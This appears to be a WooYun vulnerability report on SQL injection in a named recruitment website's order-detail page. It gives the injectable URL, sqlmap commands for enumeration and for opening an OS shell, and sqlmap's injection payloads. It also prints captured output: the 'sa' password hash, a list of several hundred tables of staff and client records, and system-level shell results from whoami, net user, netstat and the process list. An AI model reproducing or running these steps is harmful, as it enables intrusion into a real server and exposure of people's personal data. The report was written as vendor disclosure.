乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-23: 厂商已经主动忽略漏洞,细节向公众公开
英创人才网存在SQL注入漏洞(sa权限),大量表信息泄露。可拿os-shell,通过os-shell发现服务器安装了360安全卫士~~~同时有不少高危服务端口开启~~希望不要被忽略~好困,明天又要迟到挨骂了……
使用sqlmap进行注入测试:注入地址:http://www.yingchuang.com/search/orderdetail/?oid=000432691. 基础测试:
sqlmap.py -u "http://www.yingchuang.com/search/orderdetail/?oid=00043269" --dbs --current-user --users --is-dba --passwords --threads=10
2. 拿os-shell
sqlmap.py -u "http://www.yingchuang.com/search/orderdetail/?oid=00043269" --os-shell
Parameter: oid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: oid=00043269' AND 7546=7546 AND 'HObb'='HObb Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: oid=00043269' AND 3944=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3944=3944) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(112)+CHAR(113))) AND 'VdrD'='VdrD Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: oid=00043269';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: oid=00043269' WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: oid=00043269' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHsqlmap resumed the following injection point(s) from stored session:
web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005current user: 'sa'current user is DBA: Truedatabase management system users [1]:[*] sadatabase management system users password hashes:[*] sa [1]: password hash: 0x01004086ceb681aedaccfde560937a35577e4362274b259b41d8 header: 0x0100 salt: 4086ceb6 mixedcase: 81aedaccfde560937a35577e4362274b259b41d8available databases [8]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] sectordb[*] tempdb[*] workdb
web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005Database: workdb[650 tables]+---------------------------------------+| 2014_10月_決定人数 || 2014_10月_進捗増加 || 2014_10月_進捗数 || 2014_10月_進捗減少 || 2014_11月_決定人数 || 2014_11月_進捗増加 || 2014_11月_進捗数 || 2014_11月_進捗減少 || 2014_12月_決定人数 || 2014_12月_進捗増加 || 2014_12月_進捗数 || 2014_12月_進捗減少 || 2015_1月_決定人数 || 2015_1月_進捗増加 || 2015_1月_進捗数 || 2015_1月_進捗減少 || 2015_2月_決定人数 || 2015_2月_進捗増加 || 2015_2月_進捗数 || 2015_2月_進捗減少 || 2015_3月_決定人数 || 2015_3月_進捗増加 || 2015_3月_進捗数 || 2015_3月_進捗減少 || 2015_4月_決定人数 || 2015_4月_進捗増加 || 2015_4月_進捗数 || 2015_4月_進捗減少 || 2015_5月_決定人数 || 2015_5月_進捗増加 || 2015_5月_進捗数 || 2015_5月_進捗減少 || 2015_6月_決定人数 || 2015_6月_進捗増加 || 2015_6月_進捗数 || 2015_6月_進捗減少 || 2015_7月_決定人数 || 2015_7月_進捗増加 || 2015_7月_進捗数 || 2015_7月_進捗減少 || 2015_8月_決定人数 || 2015_8月_進捗増加 || 2015_8月_進捗数 || 2015_8月_進捗減少 || 2015_9月_決定人数 || 2015_9月_進捗増加 || 2015_9月_進捗数 || 2015_9月_進捗減少 || Account_Charge || Account_Close || Account_Cost || Account_Order || Account_Sales || Approval_History || Approval_Interim || Budget_Freeze || Budget_InfoFirst || Budget_InfoFirst || Budget_Results || Budget_Sales || Budget_TermResults || CO_2007_10 || CO_2007_11 || CO_2007_12 || CO_2007_5 || CO_2007_6 || CO_2007_7 || CO_2007_8 || CO_2007_9 || CO_2008_10 || CO_2008_10 || CO_2008_11 || CO_2008_12 || CO_2008_2 || CO_2008_3 || CO_2008_4 || CO_2008_5 || CO_2008_6 || CO_2008_7 || CO_2008_8 || CO_2008_9 || CO_2009_10 || CO_2009_10 || CO_2009_11 || CO_2009_12 || CO_2009_2 || CO_2009_3 || CO_2009_4 || CO_2009_5 || CO_2009_6 || CO_2009_7 || CO_2009_8 || CO_2009_9 || CO_2010_10 || CO_2010_10 || CO_2010_11 || CO_2010_12 || CO_2010_2 || CO_2010_3 || CO_2010_4 || CO_2010_5 || CO_2010_6 || CO_2010_7 || CO_2010_8 || CO_2010_9 || CO_2011_10 || CO_2011_10 || CO_2011_11 || CO_2011_12 || CO_2011_2 || CO_2011_3 || CO_2011_4 || CO_2011_5 || CO_2011_6 || CO_2011_7 || CO_2011_8 || CO_2011_9 || CO_2012_10 || CO_2012_10 || CO_2012_11 || CO_2012_12 || CO_2012_2 || CO_2012_3 || CO_2012_4 || CO_2012_5 || CO_2012_6 || CO_2012_7 || CO_2012_8 || CO_2012_9 || CO_2013_10 || CO_2013_10 || CO_2013_11 || CO_2013_12 || CO_2013_2 || CO_2013_3 || CO_2013_4 || CO_2013_5 || CO_2013_6 || CO_2013_7 || CO_2013_8 || CO_2013_9 || CO_2014_10 || CO_2014_10 || CO_2014_11 || CO_2014_12 || CO_2014_2 || CO_2014_3 || CO_2014_4 || CO_2014_5 || CO_2014_6 || CO_2014_7 || CO_2014_8 || CO_2014_9 || CO_2015_1 || CO_2015_2 || CO_2015_3 || CO_2015_4 || CO_2015_5 || CO_2015_6 || CO_2015_7 || CO_2015_8 || CO_2015_9 || Client_Address || Client_Contact || Client_Industry || Client_Info || Client_Interview || Client_Stockholder || Client_UpdateHistory || Confirmation_Info_History || Confirmation_Info_History || Contract_Documents || Contract_Info || Contract_UpdateHistory || D99_CMD || D99_REG || D99_Tmp || DIY_TEMPCOMMAND_TABLE || DailyReportTitle || Desktop_HTML || Desktop_Java || Display_Alarm || Document_NotDelevered || Document_Send || Follow_List || History_CoDay || History_CoMonth || History_GrDay || History_OrderRa || History_RaDay || History_RaMonth || History_RaReport || INPUT_Staff_Info || Individual_Budget || Individual_BudgetResults || Interview_Info || Interview_Questionnaire || Label_C1 || Label_S1 || Label_S2 || Mail_History || Order_AutoSearch_SaveID || Order_AutoSearch_SaveID || Order_CoGroup || Order_History || Order_Info || Order_Occupation || Order_RaHistory_BK20080523 || Order_RaHistory_BK20080523 || Order_UpdateHistory || PL_toyokeizai || Progress_DeleteReserve || Progress_Detail || Progress_Expectation || Progress_Info || Progress_Return || RA_2007_10 || RA_2007_11 || RA_2007_12 || RA_2007_5 || RA_2007_6 || RA_2007_7 || RA_2007_8 || RA_2007_9 || RA_2008_10 || RA_2008_10 || RA_2008_11 || RA_2008_12 || RA_2008_2 || RA_2008_3 || RA_2008_4 || RA_2008_5 || RA_2008_6 || RA_2008_7 || RA_2008_8 || RA_2008_9 || RA_2009_10 || RA_2009_10 || RA_2009_11 || RA_2009_12 || RA_2009_2 || RA_2009_3 || RA_2009_4 || RA_2009_5 || RA_2009_6 || RA_2009_7 || RA_2009_8 || RA_2009_9 || RA_2010_10 || RA_2010_10 || RA_2010_11 || RA_2010_12 || RA_2010_2 || RA_2010_3 || RA_2010_4 || RA_2010_5 || RA_2010_6 || RA_2010_7 || RA_2010_8 || RA_2010_9 || RA_2011_10 || RA_2011_10 || RA_2011_11 || RA_2011_12 || RA_2011_2 || RA_2011_3 || RA_2011_4 || RA_2011_5 || RA_2011_6 || RA_2011_7 || RA_2011_8 || RA_2011_9 || RA_2012_10 || RA_2012_10 || RA_2012_11 || RA_2012_12 || RA_2012_2 || RA_2012_3 || RA_2012_4 || RA_2012_5 || RA_2012_6 || RA_2012_7 || RA_2012_8 || RA_2012_9 || RA_2013_10 || RA_2013_10 || RA_2013_11 || RA_2013_12 || RA_2013_2 || RA_2013_3 || RA_2013_4 || RA_2013_5 || RA_2013_6 || RA_2013_7 || RA_2013_8 || RA_2013_9 || RA_2014_10 || RA_2014_10 || RA_2014_11 || RA_2014_12 || RA_2014_2 || RA_2014_3 || RA_2014_4 || RA_2014_5 || RA_2014_6 || RA_2014_7 || RA_2014_8 || RA_2014_9 || RA_2015_1 || RA_2015_2 || RA_2015_3 || RA_2015_4 || RA_2015_5 || RA_2015_6 || RA_2015_7 || RA_2015_8 || RA_2015_9 || Repayment_Info || S3_Tmp || SMS_History || SMS_Send || Staff_AccessLog || Staff_AppliedCompany || Staff_AutoSearch_SaveID || Staff_AutoSearch_SaveID || Staff_CallResults || Staff_CoHistory || Staff_Company || Staff_DeleteLog || Staff_DiagnosisResults || Staff_DuplicateLog || Staff_Entry || Staff_Family || Staff_History || Staff_HopeCondition || Staff_Info || Staff_IntakeError || Staff_IntakeFile || Staff_IntakeMapping_ARCS || Staff_IntakeMapping_ARCS || Staff_IntakeMapping_Mobile || Staff_Language_20080124_backup || Staff_Language_20080124_backup || Staff_Qualified || Staff_Recentering || Staff_Resign || Staff_ResumeNotice || Staff_SESkillSheet || Staff_School || Staff_Seminar || Staff_UpdateHistory || Starff_EntryHistory || TempSH_Company || TempSH_HopeCondition || TempSH_Qualified || TempSH_School || TempSH_StaffCoHistory || TempSH_StaffImport || TempSH_Staff_Entry || TempSH_Staff_UpdateHistory || V_STAFF_info_20070917 || V_stfflan_final || WebResource_Feature_Detail || WebResource_Feature_Detail || WebResource_Info || zv_ZClient_Order_委托数(最近3月) || zv_Zpgs_Staff_中国人_按照咨询日抽出(上月) || zv_Zpgs_Staff_中国人_按照咨询日抽出(本月) || zv_Zpgs_Staff_中国人_按照登陆日抽出(上月) || zv_Zpgs_Staff_中国人_按照登陆日抽出(本月) || zv_Zpgs_Staff_日本人_按照咨询日抽出(上月) || zv_Zpgs_Staff_日本人_按照咨询日抽出(本月) || zv_Zpgs_Staff_日本人_按照登陆日抽出(上月) || zv_Zpgs_Staff_日本人_按照登陆日抽出(本月) || zv_Zpgs_Staff_电子邮件抽出(中国人) || zv_Zpgs_Staff_电子邮件抽出(日本人) 的副本 || zv_Zpgs_Staff_电子邮件抽出(日本人) 的副本 || dtproperties || m_Apportion || m_Area || m_BranchOffice || m_BranchPrefecture || m_BusinessCalendar || m_Calendar || m_Carry || m_Comment || m_EmployeeAuthority || m_EmployeeAuthority || m_EmployeeCount || m_ExpectationPoint || m_ExpectationRank || m_GM || m_GroupL || m_GroupL || m_GroupMail || m_HighAcademy || m_Holiday || m_IndustryL || m_IndustryS || m_Interview || m_JobCount || m_LastAcademy || m_LetterPattern || m_Listed || m_MailPatternPublic || m_MailPatternPublic || m_MediaL || m_MediaL || m_MediaS || m_OccupationL || m_OccupationS || m_PageFormat || m_PaymentSite || m_Prefecture || m_ProgressStatus || m_ProgressStep || m_QualifiedL || m_QualifiedS || m_Seminar || m_StaffStatus || m_SubWayL || m_SubWayS || m_TaxRate || m_Team || ml_NPR || ml_addlist || ml_auto || ml_category_group || ml_category_occupation || ml_header || ml_info || ml_mailmagazine || ml_reghistory || ml_testaddlist || mobile_Condition || sqlmapoutput || sys_ChargeMax || sys_Config || sys_Division || sys_Extension || sys_Message_JP || sys_Message_JP || sys_OrderMax || sys_StaffImportMail || sys_StaffMax || sysdiagrams || temp_Apportion || temp_ClientInfo || temp_staff || v_Account_Close_Check || v_Account_List || v_Account_Order || v_Account_Progress || v_All_Business || v_All_Consultant || v_All_Group || v_All_Team || v_ApportionStaff || v_BO_Employee || v_BO_PoolGroup || v_Budget_Set_BusinessFirst || v_Budget_Set_BusinessNow || v_Budget_Set_BusinessResult || v_Budget_Set_First || v_Budget_Set_Now || v_Budget_Set_Result || v_CallResults_First || v_CallResults_New || v_CallResults_Old || v_CallResults_Second || v_ClientInfo || v_Client_Contact_Update || v_Client_REMARK || v_Close_Business_Sales || v_Close_Consultant_Sales || v_ContractApproval || v_DJNO_候補者NO || v_Day_ToNextMonth || v_DocumentSend_History || v_Entry_CSV_Satff || v_Entry_Date_Csv || v_Entry_Second || v_Into_Document_Send || v_MaxClientStock || v_Order_Cleaning || v_Order_Pdf || v_PrgCnt || v_PrgHistory2 || v_PrgHistory2 || v_PrgInfoIncNG || v_PrgMidList || v_ProgressDetail2 || v_ProgressDetail2 || v_ProgressInfo || v_ProgressList2 || v_ProgressList2 || v_Seminar_Count || v_Seminar_Count || v_StaffBasicInfo || v_StaffDelete || v_StaffDetail_Company1 || v_StaffDetail_Company1 || v_StaffDetail_Contact || v_StaffDetail_HopeCondition || v_StaffDetail_JobChange || v_StaffDetail_Other || v_StaffDetail_Profile1 || v_StaffDetail_Profile1 || v_StaffDetail_School || v_StaffDetail_Skill || v_StaffIntakeError2 || v_StaffIntakeError2 || v_StaffList1 || v_StaffList1 || v_StaffReference_Seminar || v_Staff_Company || v_Staff_History || v_Staff_HopeCondition || v_Staff_INFO_CHENB || v_Staff_Info_CSV2 || v_Staff_Info_CSV2 || v_Staff_Info_SPEC || v_Staff_Qualified || v_Staff_Resume_BIKOU || v_Staff_School || v_UpdateOrder || v_Update_Staff_CO || v_WebCarryOrderOccu || v_WebCarryOrderOccu || v_WebCarryOrderOccu || v_WebCarryPerformance || v_Yearly_Income_Assessment_Csv || v_ac_AddressLabel || v_ac_Assessment || v_ac_Bill_1 || v_ac_Bill_1 || v_ac_BranchOffice_List1 || v_ac_BranchOffice_List1 || v_ac_BranchOffice_List1 || v_ac_BranchOffice_Main || v_ac_ClientLabel || v_ac_Confirmation_Contract || v_ac_Confirmation_Invoice || v_ac_Confirmation_Kihyo || v_ac_Confirmation_Label || v_ac_Confirmation_Report_sakai || v_ac_Confirmation_Report_sakai || v_ac_Contract_Report || v_ac_DivA01 || v_ac_DivA38 || v_ac_DivE08 || v_ac_DivE09 || v_ac_Document_History || v_ac_Dummy || v_ac_EmployeeAuthority || v_ac_Employee_List || v_ac_GroupL_List || v_ac_Group_List || v_ac_Group_List || v_ac_Label1 || v_ac_Label2 || v_ac_Letter || v_ac_Repayment_Label || v_ac_Repayment_Report || v_ac_Staff_DuplicateLog || v_ac_Staff_Recentering || v_ac_Staff_UpdateHistory_CO || v_ac_Staff_UpdateHistory_CO || v_ac_Staff_UpdateHistory_get_co || v_ac_Team_List || v_ac_kihyo || v_acc_AlertInfo || v_acc_ClientAddress || v_acc_Confirmation_Info || v_acc_CostInput || v_acc_Header || v_acc_RepaymentInfo || v_acc_RepaymentInfo || v_acc_SendAddress || v_bo_Accept_Client || v_bo_BudgetPeriodAll || v_bo_BudgetPeriodGroup || v_bo_BudgetPeriod_CO_Else || v_bo_BudgetPeriod_CO_Else || v_bo_BudgetPeriod_RA_Else || v_bo_BudgetPeriod_RA_Else || v_bo_BudgetResultsMonthAll || v_bo_BudgetResultsMonthGroup || v_bo_BusinessDay || v_bo_CO_Total || v_bo_ContentsChangePrList || v_bo_DecisionDays || v_bo_DecisionList || v_bo_DeclineList || v_bo_DocumentDays || v_bo_FailureList || v_bo_InterviewDays || v_bo_MonthlyMain || v_bo_MonthlyMaster || v_bo_Monthly_Report || v_bo_PrCancelMany || v_bo_PrCancelMany || v_bo_RA_Total || v_bo_RepaymentPrList || v_bo_Sales_Progress_List || v_bo_SateiGroup || v_bo_Staff_Detail || v_bo_getPeriod || v_cmn_Credit_CSV || v_cmn_Detail_Csv || v_pgs_AlertInfo || v_pgs_BussinessMail1_CN || v_pgs_BussinessMail1_CN || v_pgs_BussinessMail1_EN || v_pgs_BussinessMail2_CN || v_pgs_BussinessMail2_CN || v_pgs_BussinessMail2_EN || v_pgs_ClientContactForConfirmation || v_pgs_ConfirmationApproval || v_pgs_ConfirmationCreate1 || v_pgs_ConfirmationCreate2 || v_pgs_ContactMethod || v_pgs_ContentChangeConfirmationCreate || v_pgs_DecisionApproval || v_pgs_Employee2 || v_pgs_Employee2 || v_pgs_EmployeeNewCreate || v_pgs_ExpectationList_ACC || v_pgs_ExpectationList_ACC || v_pgs_ExpectationSettingClient || v_pgs_ExpectationSettingStaff || v_pgs_InterviewInfo || v_pgs_MailAddrInfoList || v_pgs_MailAddrInfoList || v_pgs_OrderClip2 || v_pgs_OrderClip_zh || v_pgs_OrderClip_zh || v_pgs_ProgressInput || v_pgs_StaffHopeCondition || v_pgs_StaffInfo || v_pgs_StaffOrder || v_pgs_StaffQualified || v_pgs_StaffRefBody2 || v_staff_language20080118 || v_staff_language20080118 || v_stf_FirstCallMail || v_stf_Seminar || メタタグデータ || 外部クライアントCSV格納テーブル || 非コンサルグループ再振分テーブル |+---------------------------------------+
os-shell证明:
os-shell> whoamido you want to retrieve the command standard output? [Y/n/a][01:28:12] [INFO] the SQL query used returns 1 entries[01:28:12] [INFO] retrieved: nt authority\\\\systemcommand standard output [1]:[*] nt authority\system
os-shell> net userdo you want to retrieve the command standard output? [Y/n/a][01:31:21] [INFO] the SQL query used returns 9 entries[01:31:22] [INFO] retrieved:[01:31:22] [INFO] retrieved: \\\\\\\\ のユーザー アカウント[01:31:23] [INFO] retrieved:[01:31:23] [INFO] retrieved: ------------------------------------------------...[01:31:24] [INFO] retrieved: Administrator ASPNET ...[01:31:24] [INFO] retrieved: ftpuser god ...[01:31:25] [INFO] retrieved: influx inte ...[01:31:25] [INFO] retrieved: IWAM_SHDB-TEST nakatani ...[01:31:26] [INFO] retrieved: qihua staffdata ...
发现里面是开了3389远程端口的,可惜是内网。
command standard output:---Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING TCP 0.0.0.0:1556 0.0.0.0:0 LISTENING TCP 0.0.0.0:2301 0.0.0.0:0 LISTENING TCP 0.0.0.0:2381 0.0.0.0:0 LISTENING TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING TCP 0.0.0.0:3333 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING TCP 0.0.0.0:5800 0.0.0.0:0 LISTENING TCP 0.0.0.0:5900 0.0.0.0:0 LISTENING TCP 0.0.0.0:13724 0.0.0.0:0 LISTENING TCP 0.0.0.0:13782 0.0.0.0:0 LISTENING TCP 127.0.0.1:135 127.0.0.1:15546 ESTABLISHED TCP 127.0.0.1:1025 127.0.0.1:15547 ESTABLISHED TCP 127.0.0.1:1028 127.0.0.1:1029 ESTABLISHED TCP 127.0.0.1:1029 127.0.0.1:1028 ESTABLISHED TCP 127.0.0.1:1031 0.0.0.0:0 LISTENING TCP 127.0.0.1:1031 127.0.0.1:1036 ESTABLISHED TCP 127.0.0.1:1031 127.0.0.1:1052 ESTABLISHED TCP 127.0.0.1:1036 127.0.0.1:1031 ESTABLISHED TCP 127.0.0.1:1049 0.0.0.0:0 LISTENING TCP 127.0.0.1:1052 127.0.0.1:1031 ESTABLISHED TCP 127.0.0.1:1060 0.0.0.0:0 LISTENING TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING TCP 127.0.0.1:1557 0.0.0.0:0 LISTENING TCP 127.0.0.1:15546 127.0.0.1:135 ESTABLISHED TCP 127.0.0.1:15547 127.0.0.1:1025 ESTABLISHED TCP 172.26.9.1:139 0.0.0.0:0 LISTENING TCP 172.26.9.1:1433 172.26.8.1:52126 ESTABLISHED TCP 172.26.9.1:1433 172.26.8.1:61046 ESTABLISHED TCP 172.26.9.1:1433 172.26.8.1:61059 ESTABLISHED TCP 172.26.9.1:1433 172.26.8.1:61097 ESTABLISHED TCP 172.26.9.1:1433 172.26.8.1:61107 ESTABLISHED TCP 172.26.9.1:1433 172.26.9.1:14824 ESTABLISHED TCP 172.26.9.1:1433 172.26.9.1:15482 ESTABLISHED TCP 172.26.9.1:1433 172.26.9.1:15556 ESTABLISHED TCP 172.26.9.1:1433 172.26.9.1:15557 ESTABLISHED TCP 172.26.9.1:1433 172.26.9.3:12984 ESTABLISHED TCP 172.26.9.1:12140 210.52.214.177:80 ESTABLISHED TCP 172.26.9.1:14824 172.26.9.1:1433 ESTABLISHED TCP 172.26.9.1:15482 172.26.9.1:1433 ESTABLISHED TCP 172.26.9.1:15533 111.206.79.136:80 ESTABLISHED TCP 172.26.9.1:15556 172.26.9.1:1433 ESTABLISHED TCP 172.26.9.1:15557 172.26.9.1:1433 ESTABLISHED UDP 0.0.0.0:161 *:* UDP 0.0.0.0:445 *:* UDP 0.0.0.0:1032 *:* UDP 0.0.0.0:3600 *:* UDP 0.0.0.0:12141 *:* UDP 127.0.0.1:123 *:* UDP 127.0.0.1:12554 *:* UDP 172.26.9.1:123 *:*---
看看里面运行的程序(竟然在服务器运行了360!!!)
command standard output:---イメージ名 PID セッション名 セッション# メモリ使用量========================= ======== ================ =========== ============System Idle Process 0 0 28 KSystem 4 0 264 Ksmss.exe 372 0 528 Kcsrss.exe 424 0 5,672 Kwinlogon.exe 456 0 9,704 Kservices.exe 508 0 11,164 Klsass.exe 524 0 18,908 Ksvchost.exe 680 0 11,564 Ksvchost.exe 776 0 11,560 Ksvchost.exe 844 0 13,628 Ksvchost.exe 860 0 12,092 Ksvchost.exe 876 0 58,780 KZhuDongFangYu.exe 924 0 19,172 Kspoolsv.exe 1112 0 10,568 Kcissesrv.exe 1232 0 5,556 Kvcagent.exe 1248 0 14,984 Kserver.exe 1292 0 6,632 Kinetinfo.exe 1460 0 17,012 KMsDtsSrvr.exe 1516 0 33,064 Kmsftesql.exe 1760 0 10,912 Ksqlservr.exe 1784 0 1,690,772 Kmsmdsrv.exe 1820 0 32,212 KProLiantMonitor.exe 1916 0 12,856 KReportingServicesService. 1960 0 103,492 KccSvcHst.exe 2072 0 17,804 Ksnmp.exe 2148 0 13,996 Ksqlwriter.exe 2184 0 10,332 Ksmhstart.exe 2296 0 16,900 Ksvchost.exe 2460 0 12,912 Kpbx_exchange.exe 2484 0 7,560 Kcmd.exe 2620 0 3,188 Khpsmhd.exe 2636 0 26,864 Kwinvnc4.exe 2732 0 6,816 Kcpqnimgt.exe 2816 0 16,220 Kcqmgserv.exe 2844 0 10,440 Kcqmgstor.exe 2912 0 12,468 Kvnetd.exe 2944 0 8,028 Kwmiprvse.exe 3144 0 13,756 Kcmd.exe 3192 0 3,140 Krotatelogs.exe 3200 0 4,668 Kcmd.exe 3208 0 3,140 Krotatelogs.exe 3216 0 4,668 Khpsmhd.exe 3228 0 29,200 KSQLAGENT90.EXE 3288 0 7,180 Kcmd.exe 3320 0 3,148 Krotatelogs.exe 3328 0 4,668 Kcmd.exe 3340 0 3,148 Krotatelogs.exe 3348 0 4,668 Ksvchost.exe 3364 0 17,152 Kbpinetd.exe 3384 0 11,276 Kbpcd.exe 4388 0 8,884 Kwmiprvse.exe 4540 0 23,152 Kcqmghost.exe 4604 0 15,576 KSmc.exe 4672 0 8,172 Kalg.exe 4756 0 9,024 Kunsecapp.exe 5020 0 9,448 Kcsrss.exe 4472 Console 2 4,936 Kwinlogon.exe 2960 Console 2 13,184 Ksvchost.exe 1668 0 9,952 Klogon.scr 4296 Console 2 4,084 Kcsrss.exe 8116 1 7,284 Kwinlogon.exe 6824 1 9,544 Krdpclip.exe 8052 1 9,852 Kctfmon.exe 3132 1 5,988 Kexplorer.exe 4808 1 34,980 Kcpqteam.exe 948 1 5,156 K360tray.exe 4860 1 6,808 KSoftMgrLite.exe 7212 1 16,676 KMSACCESS.EXE 5100 1 38,144 KccSvcHst.exe 5892 1 3,120 KSDIS.exe 8020 1 20,012 Kcmd.exe 7204 0 3,160 K---
好困,不玩了,希望不要被忽略。
增加过滤。
未能联系到厂商或者厂商积极拒绝
